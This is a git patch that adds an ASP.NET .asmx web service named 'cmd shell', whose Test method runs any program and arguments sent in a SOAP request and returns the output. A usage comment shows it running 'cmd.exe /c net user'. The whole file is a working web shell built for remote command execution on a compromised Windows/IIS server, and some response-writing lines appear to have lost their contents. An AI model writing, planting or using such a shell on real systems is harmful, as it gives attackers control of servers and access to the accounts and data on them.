From be43efc9ac139450ecd26cdcee23bb40ac0c7269 Mon Sep 17 00:00:00 2001 From: Rvn0xsy Date: Mon, 29 Aug 2022 11:32:15 +0800 Subject: [PATCH] add asmx format cmd shell --- aspx/cmd.asmx | 84 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 aspx/cmd.asmx diff --git a/aspx/cmd.asmx b/aspx/cmd.asmx new file mode 100644 index 0000000..d97ef0c --- /dev/null +++ b/aspx/cmd.asmx @@ -0,0 +1,84 @@ +<%-- +Usage: +POST /test.asmx/Test HTTP/1.1 +Host: example.com +Content-Type: text/xml; charset=utf-8 +Content-Length: 363 +SOAPAction: "http://tempuri.org/Test" + + + + + cmd.exe + /c net user + + + +--%> + +<%@ WebService Language="C#" Class="Service" %> +using System; +using System.Web; +using System.IO; +using System.Net; +using System.Text; +using System.Data; +using System.Data.SqlClient; +using System.Collections.Generic; +using System.Diagnostics; +using System.Web.SessionState; +using System.Web.Services; +using System.Xml; +using System.Web.Services.Protocols; + +[WebService(Namespace = "http://www.payloads.online/")] +[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] + +public class New_Process :Process +{ + public New_Process(string s) + { + + } + +} + + +public class Service : System.Web.Services.WebService +{ + public Service() + { + + } + + [WebMethod] + public string Test(string Z1,string Z2) + { + String R; + + ProcessStartInfo c = new ProcessStartInfo(Z1,Z2); + Process e = new New_Process("something"); + StreamReader OT, ER; + c.UseShellExecute = false; + c.RedirectStandardOutput = true; + c.RedirectStandardError = true; + e.StartInfo = c; + + e.Start(); + OT = e.StandardOutput; + ER = e.StandardError; + e.Close(); + R = OT.ReadToEnd() + ER.ReadToEnd(); + HttpContext.Current.Response.Clear(); + HttpContext.Current.Response.Write(""); + HttpContext.Current.Response.Write(""); + HttpContext.Current.Response.Write(""); + HttpContext.Current.Response.Write(""); + HttpContext.Current.Response.End(); + return R; + } +} \ No newline at end of file